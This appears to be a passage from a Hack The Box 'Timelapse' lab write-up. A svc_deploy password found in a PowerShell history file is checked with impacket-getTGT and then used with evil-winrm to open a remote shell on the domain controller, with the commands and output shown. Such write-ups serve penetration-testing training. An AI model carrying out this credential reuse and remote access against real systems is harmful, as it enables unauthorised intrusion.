legacyy


A CLEARTEXT credential for the svc_deploy account has been disclosed in the PowerShell history file of the legacyy user While it is unclear if the svc_deploy account is also part of the Remote Management Users group, other validation methods can be used.

┌──(kali㉿kali)-[~/archive/htb/labs/timelapse]
└─$ impacket-getTGT timelapse.htb/svc_deploy@dc01.timelapse.htb -dc-ip $IP 
Impacket v0.11.0 - Copyright 2023 Fortra
 
password: E3R$Q62^12p7PLlC%KWaxuaV
[*] Saving ticket in svc_deploy@dc01.timelapse.htb.ccache

Validation complete by generating a TGT Lateral Movement made to the svc_deploy account

WinRM


As discovered through ldapdomanindump and bloodhound session, the svc_deploy account is part of the Remote Management Users group

┌──(kali㉿kali)-[~/archive/htb/labs/timelapse]
└─$ evil-winrm -i dc01.timelapse.htb -S -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV'
 
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami
timelapse\svc_deploy
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> hostname
dc01
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::245
   IPv6 Address. . . . . . . . . . . : dead:beef::cc93:dbe2:8401:964
   Link-local IPv6 Address . . . . . : fe80::cc93:dbe2:8401:964%13
   IPv4 Address. . . . . . . . . . . : 10.10.11.152
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%13
                                       10.10.10.2

PowerShell session established